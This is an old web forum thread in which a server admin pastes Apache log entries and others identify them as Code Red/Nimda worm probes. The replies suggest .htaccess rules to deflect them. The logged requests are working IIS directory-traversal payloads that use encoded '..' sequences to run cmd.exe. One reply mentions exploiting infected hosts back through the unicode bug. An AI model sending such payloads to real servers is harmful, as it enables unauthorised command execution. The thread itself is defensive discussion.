apache access.log
Results 1 to 7 of 7

Thread: apache access.log

  1. #1

    Question apache access.log

    So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?


    66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
    66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"



    And is there a way for me to make apache just deny any requests from this other machine? I've found quite a few more and I think another host is actually doing this same routine as we speak.

  2. #2
    Looks VERY much like Nimda/Code red

  3. #3
    yeah its like... i figured it couldnt be a real human hack attempt cause of the rate of the URL requests or whatever... theres like two per second sometimes.
    Analog = Classical
    Digital = Techno

  4. #4
    Junior Member
    Join Date
    May 2002
    Posts
    9
    That's probably one of the Internet worms looking for an unpatched IIS server (Commonly Code Red). If you use UNIX, you don't have to worry about these log entries as they don't affect Apache, if you use Windows, make sure you are fully patched.

    I have the following lines at the end of my .htaccess file:
    Code:
    redirect /scripts http://www.whatever.invalid/
    redirect /MSADC http://www.whatever.invalid/
    redirect /c http://www.whatever.invalid/
    redirect /d http://www.whatever.invalid/
    redirect /_mem_bin http://whatever.invalid/
    redirect /msadc http://whatever.invalid/
    RedirectMatch (.*)\cmd.exe$ http://whatever.invalid/$1

  5. #5
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Just for fun, grep | wc -l your access_log and error_log for "cmd.exe" and see how many log entries there are for such IIS hack attempts: it's mind boggling!

    On a low traffic apache server at work, I get 2712 hits for cmd.exe (log starts june 14)!!

    Ammo
    Credit travels up, blame travels down -- The Boss

  6. #6
    Im running it on an XP machine... its just going to be up for a while to test a website so this client can look at it but... man... I am really surprised how often this is going... its crazy to see how many times my machine gets hit with that... I thought code red and the like were all but gone! Guess not!

    Analog = Classical
    Digital = Techno

  7. #7
    Leftie Linux Lover the_JinX's Avatar
    Join Date
    Nov 2001
    Location
    Beverwijk Netherlands
    Posts
    2,534
    propably someone infected with as stated before, the code-red or nimda virus..

    the funny thing is, you can use this against them..
    When I was a mere scriptkiddie, I would search my logs for these and the fact is, if they have this worm, they can also be exploited via the unicode bug

    Not that any of us would ever do so.. so you can mail the man/woman behind the IP and tell them theyve got a serious problem..


    Linux: don't be part of the probelem, be part of the solution..
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •